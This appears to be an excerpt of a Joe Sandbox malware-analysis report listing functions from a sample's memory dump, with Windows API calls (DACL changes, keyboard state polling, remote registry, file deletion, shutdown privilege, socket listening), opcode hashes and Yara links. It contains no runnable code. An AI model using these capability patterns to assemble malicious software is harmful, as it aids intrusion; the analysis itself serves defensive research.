                                                                    • Part of subcall function 00948202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0094821E
                                                                    • Part of subcall function 00948202: GetLastError.KERNEL32(?,00947CE2,?,?,?), ref: 00948228
                                                                    • Part of subcall function 00948202: GetProcessHeap.KERNEL32(00000008,?,?,00947CE2,?,?,?), ref: 00948237
                                                                    • Part of subcall function 00948202: HeapAlloc.KERNEL32(00000000,?,00947CE2,?,?,?), ref: 0094823E
                                                                    • Part of subcall function 00948202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00948255
                                                                    • Part of subcall function 0094829F: GetProcessHeap.KERNEL32(00000008,00947CF8,00000000,00000000,?,00947CF8,?), ref: 009482AB
                                                                    • Part of subcall function 0094829F: HeapAlloc.KERNEL32(00000000,?,00947CF8,?), ref: 009482B2
                                                                    • Part of subcall function 0094829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00947CF8,?), ref: 009482C3
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00947D13
                                                                  • _memset.LIBCMT ref: 00947D28
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00947D47
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00947D58
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00947D95
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00947DB1
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00947DCE
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00947DDD
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00947DE4
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00947E05
                                                                  • CopySid.ADVAPI32(00000000), ref: 00947E0C
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00947E3D
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00947E63
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00947E77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: c50549e22134a40ceb329dd190c4c50600188bb2146f093845d518d54f9fae5d
                                                                  • Instruction ID: c9eedee99af9a3986d9d622164ae4ccdcd6c5bc2d6ebc8695c59b6f2eba34cf7
                                                                  • Opcode Fuzzy Hash: c50549e22134a40ceb329dd190c4c50600188bb2146f093845d518d54f9fae5d
                                                                  • Instruction Fuzzy Hash: D5614971908209AFDF00DFA4DC95EEEBBB9FF44300F048269E915A72A1DB319A45DB60
                                                                  Function 009066E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                  • API String ID: 0-4052911093
                                                                  • Opcode ID: 3937129eb20bff8e041a456ed8923727e850c002432192337ceb69cbe2b95e21
                                                                  • Instruction ID: d59f21b670bdff1b7ba8d3eaa886a87337ad63c9cd03d170b0ae4559254ba16a
                                                                  • Opcode Fuzzy Hash: 3937129eb20bff8e041a456ed8923727e850c002432192337ceb69cbe2b95e21
                                                                  • Instruction Fuzzy Hash: 61726075E04229DFDB24CF58C880BAEB7B5FF48710F14816AE959EB290E7749D81CB90
                                                                  Function 0095001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00950097
                                                                  • SetKeyboardState.USER32(?), ref: 00950102
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00950122
                                                                  • GetKeyState.USER32(000000A0), ref: 00950139
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00950168
                                                                  • GetKeyState.USER32(000000A1), ref: 00950179
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009501A5
                                                                  • GetKeyState.USER32(00000011), ref: 009501B3
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009501DC
                                                                  • GetKeyState.USER32(00000012), ref: 009501EA
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00950213
                                                                  • GetKeyState.USER32(0000005B), ref: 00950221
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 211ee86ce309ff8061960b9da21da81b023778b2034529bc922987a5fffe657e
                                                                  • Instruction ID: f16a308214009e1b50d35ccf63415d2006a49416e9cd99dc39a783d8ee22566e
                                                                  • Opcode Fuzzy Hash: 211ee86ce309ff8061960b9da21da81b023778b2034529bc922987a5fffe657e
                                                                  • Instruction Fuzzy Hash: 80512E3090878829FB34DB7188547EABFB89F81381F08459EDDC6575C3DAA49B8CC762
                                                                  Function 009703DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009704AC
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0097054B
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009705E3
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00970822
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0097082F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: cd0d0b1bfd62d9902d894d11f8fa90ce126c869194b454d7fded0e6f8e4bbe95
                                                                  • Instruction ID: 6fc06bf9bab21214139482a429c82b1b2e1032f53a9293378db53bd18870f7c1
                                                                  • Opcode Fuzzy Hash: cd0d0b1bfd62d9902d894d11f8fa90ce126c869194b454d7fded0e6f8e4bbe95
                                                                  • Instruction Fuzzy Hash: 4EE14D71204204EFCB14DF28C895E6ABBE8FF89714F04C96DF949DB2A1D631E941CB92
                                                                  Function 00964164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: d600bf7412b6d987014860c7ca581ec344f3090f240fc1e8a35f2a4bb5349402
                                                                  • Instruction ID: 9ad18c4ecf6908b30d0610f404c2fb2b764373cc0da7b27270d82aee9d44a808
                                                                  • Opcode Fuzzy Hash: d600bf7412b6d987014860c7ca581ec344f3090f240fc1e8a35f2a4bb5349402
                                                                  • Instruction Fuzzy Hash: 8E21E5362182189FDB00AF64DC19B6D7BA8FF55750F118026F949EB2B1CB34AC40DB85
                                                                  Function 009537EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009538A3
                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0095394B
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0095395E
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0095397B
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095399D
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009539B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 4002782344-1173974218
                                                                  • Opcode ID: 850f2b575b0914675058af4fa1c04cf00543c90433dc086876049e5c26210bb3
                                                                  • Instruction ID: 8ec60560af6712b86a83fa80b51c14812fc8b27ec17d811e8552bcea345e76cd
                                                                  • Opcode Fuzzy Hash: 850f2b575b0914675058af4fa1c04cf00543c90433dc086876049e5c26210bb3
                                                                  • Instruction Fuzzy Hash: 0F51AD3180414CAADF05EBB5D9A29FDB778AF14341F604069E906B7192EF716F0DCB62
                                                                  Function 0095F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0095F440
                                                                  • Sleep.KERNEL32(0000000A), ref: 0095F470
                                                                  • _wcscmp.LIBCMT ref: 0095F484
                                                                  • _wcscmp.LIBCMT ref: 0095F49F
                                                                  • FindNextFileW.KERNEL32(?,?), ref: 0095F53D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F553
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                  • String ID: *.*
                                                                  • API String ID: 713712311-438819550
                                                                  • Opcode ID: f686484ba7027409419f646a593f104493e0f7bc7b319013773a9d8399522403
                                                                  • Instruction ID: 7c88c9beb08de7b4c968530e8e7052dbb3a389ceb44c9e17a5296e7763bac2ac
                                                                  • Opcode Fuzzy Hash: f686484ba7027409419f646a593f104493e0f7bc7b319013773a9d8399522403
                                                                  • Instruction Fuzzy Hash: 08419E7190420D9BDF14DF68CC68AFEBBB8FF05321F104465F918A2190EB309A89CB51
                                                                  Function 00905760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 0e96ca1acbbe6925c4bfc8ce69f4f0f99ccaa3ad01ff2b2dc69a6f78eb5ffe7f
                                                                  • Instruction ID: d632f1b7ff8fc0e5042fa40c08c4836dd16f069a6f883edaa853772e146a8353
                                                                  • Opcode Fuzzy Hash: 0e96ca1acbbe6925c4bfc8ce69f4f0f99ccaa3ad01ff2b2dc69a6f78eb5ffe7f
                                                                  • Instruction Fuzzy Hash: 66128A70A00A09DFDF04DFA5D981AEEB7F5FF88300F514529E946E7290EB3AA950CB51
                                                                  Function 00953B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00953B89
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00953BD9
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00953BEA
                                                                  • FindClose.KERNEL32(00000000), ref: 00953C01
                                                                  • FindClose.KERNEL32(00000000), ref: 00953C0A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 2649000838-1173974218
                                                                  • Opcode ID: 85cc30be3b26f807c119357b78fea3da4e8264e2681762c8744fdbe6976fcc59
                                                                  • Instruction ID: 35046fe3600f009bc94813d8a48a1cae03d511d338a3120d4d8ec8aaaa021d52
                                                                  • Opcode Fuzzy Hash: 85cc30be3b26f807c119357b78fea3da4e8264e2681762c8744fdbe6976fcc59
                                                                  • Instruction Fuzzy Hash: 2E316D3200C389ABC301EB28D8A58BFB7A8BE95315F444D2DF9D5D6191EB219A0CD763
                                                                  Function 009551BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                    • Part of subcall function 009487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                    • Part of subcall function 009487E1: GetLastError.KERNEL32 ref: 00948865
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 009551F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 5433e44a94baa7baf5992fdfad9ce73c833d6eee35a3a56a8d2f2b376f5da750
                                                                  • Instruction ID: c699e440fee0d0988598157e2d78d252903b694d0d463e2750ec301cb5e5e2db
                                                                  • Opcode Fuzzy Hash: 5433e44a94baa7baf5992fdfad9ce73c833d6eee35a3a56a8d2f2b376f5da750
                                                                  • Instruction Fuzzy Hash: A2012B317A56116BF728E26A9CBAFBB729CEB05353F220821FD27E20D3D9515C088790
                                                                  Function 00966283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009662DC
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009662EB
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00966307
                                                                  • listen.WSOCK32(00000000,00000005), ref: 00966316
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966330
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00966344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: de97518d9d59300627050db9813c27f0caac57fed5dec3c9db06af088bc5f732
                                                                  • Instruction ID: 867d0695f26eb1c90b563ba63bc16ad85c8b06208490fee2a82b30d51ef26010
                                                                  • Opcode Fuzzy Hash: de97518d9d59300627050db9813c27f0caac57fed5dec3c9db06af088bc5f732
                                                                  • Instruction Fuzzy Hash: FE21BB326002049FCB00AF68C859F6EB7A9EF49720F148569E95AE73D1CB70AC41DB52
                                                                  Function 00905520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • _memmove.LIBCMT ref: 00940258
                                                                  • _memmove.LIBCMT ref: 0094036D
                                                                  • _memmove.LIBCMT ref: 00940414
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1300846289-0
                                                                  • Opcode ID: 91e80998b588ba2ff851c51e7ef96f6aa1fd9a4208d7b43f16834af3ae883dce
                                                                  • Instruction ID: 8e2834d057ed53674e363f534835c4dcd9062807e5b4a3072ceca0fe97987cab
                                                                  • Opcode Fuzzy Hash: 91e80998b588ba2ff851c51e7ef96f6aa1fd9a4208d7b43f16834af3ae883dce
                                                                  • Instruction Fuzzy Hash: E902AE70A00209DFCF04DF68D981ABEBBB5FF88300F558469E90ADB295EB75D950CB91
                                                                  Function 008F1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 008F19FA
                                                                  • GetSysColor.USER32(0000000F), ref: 008F1A4E
                                                                  • SetBkColor.GDI32(?,00000000), ref: 008F1A61
                                                                    • Part of subcall function 008F1290: DefDlgProcW.USER32(?,00000020,?), ref: 008F12D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ColorProc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 3744519093-0
                                                                  • Opcode ID: 97b543d7bd48f26ac620abc6070977c3aeca9ad3c42caa2a01a386975799a67d
                                                                  • Instruction ID: fbd4a03637ec0e32e95de2d723fc1ea510e01dfc0b3717183356667f355cd37e
                                                                  • Opcode Fuzzy Hash: 97b543d7bd48f26ac620abc6070977c3aeca9ad3c42caa2a01a386975799a67d
                                                                  • Instruction Fuzzy Hash: 0EA16AB121656CFADE28AB389C5CFBF36DCFF82759F140219F312D1196CA258D4092B2
                                                                  Function 0095BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095BCE6
                                                                  • _wcscmp.LIBCMT ref: 0095BD16
                                                                  • _wcscmp.LIBCMT ref: 0095BD2B
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095BD3C
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0095BD6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
